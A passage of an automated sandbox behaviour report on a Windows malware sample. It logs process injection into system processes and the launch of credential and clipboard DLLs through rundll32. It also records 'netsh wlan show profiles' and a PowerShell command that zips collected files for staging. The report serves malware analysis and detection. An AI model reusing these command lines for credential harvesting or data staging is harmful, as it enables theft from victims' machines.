                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeThread register set: target process: 3000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeThread register set: target process: 740Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeThread register set: target process: 1884Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeThread register set: target process: 2084Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeThread register set: target process: 2184Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeThread register set: target process: 2376Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6FDB50000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF68DEA0000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF63B520000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF68DEA0000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF63B520000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6FDB50000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF63B520000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF68DEA0000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6FDB50000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB50000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB51000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB55000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB57000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB58000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB59000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB5A000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\audiodg.exe base: A2DF4CD010Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA0000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA1000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA5000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA7000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA8000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA9000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEAA000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\svchost.exe base: FEA05FA010Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B520000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B521000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B525000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B527000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B528000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B529000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B52A000Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\msiexec.exe base: 2A2C4F010Jump to behavior
                          Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: AFF0000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA0000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA1000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA5000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA7000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA8000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA9000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEAA000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 3C09BC010Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B520000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B521000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B525000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B527000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B528000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B529000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B52A000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 3C84925010Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB50000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB51000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB55000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB57000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB58000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB59000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB5A000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: F3BE781010Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B520000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B521000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B525000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B527000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B528000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B529000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B52A000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: BE44790010Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB50000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB51000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB55000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB57000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB58000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB59000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB5A000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 954DB0C010Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA0000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA1000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA5000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA7000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA8000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA9000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEAA000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 1964271010Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeProcess created: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                          Source: explorer.exe, 00000005.00000003.2195046307.00000000088B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3084849985.00000000088B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817477246.0000000004040000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                          Source: explorer.exe, 00000005.00000000.1326805098.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3805890683.0000000000BB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                          Source: explorer.exe, 00000005.00000002.3800899571.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1326366348.00000000005A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanZw
                          Source: explorer.exe, 00000005.00000000.1326805098.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3805890683.0000000000BB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                          Source: explorer.exe, 00000005.00000000.1326805098.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3805890683.0000000000BB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B0107EC cpuid 5_2_0B0107EC
                          Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_0B0173AC
                          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_0B01823C
                          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_0B017AB4
                          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_0B00EACC
                          Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,5_2_0B010098
                          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,5_2_0B017528
                          Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,5_2_0C5D0C98
                          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,5_2_0C5D7E50
                          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_0C5D8E3C
                          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_0C5CF6CC
                          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_0C5D86B4
                          Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_0C5D7FAC
                          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,5_2_0C5DA040
                          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0C5DA0F4
                          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,5_2_0C5D8128
                          Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,5_2_0C5DA1F8
                          Source: C:\Windows\explorer.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,5_2_0C5D2ABC
                          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0C5E0378
                          Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,5_2_0C5D9BD4
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,16_2_00007FFEEE22FA48
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: GetProcAddress,GetLocaleInfoW,16_2_00007FFEEE1DDC20
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,16_2_00007FFEEE22F8C0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,16_2_00007FFEEE22F478
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,16_2_00007FFEEE22D2E0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: EnumSystemLocalesW,16_2_00007FFEEE22F35C
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,16_2_00007FFEEE22F3C4
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,18_2_004F2516
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: EnumSystemLocalesW,18_2_004F27B8
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: EnumSystemLocalesW,18_2_004F2803
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: EnumSystemLocalesW,18_2_004F289E
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: EnumSystemLocalesW,18_2_004E88AC
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,18_2_004F2929
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: GetLocaleInfoW,18_2_004F2B7C
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_004F2CA2
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: GetLocaleInfoW,18_2_004E8DCE
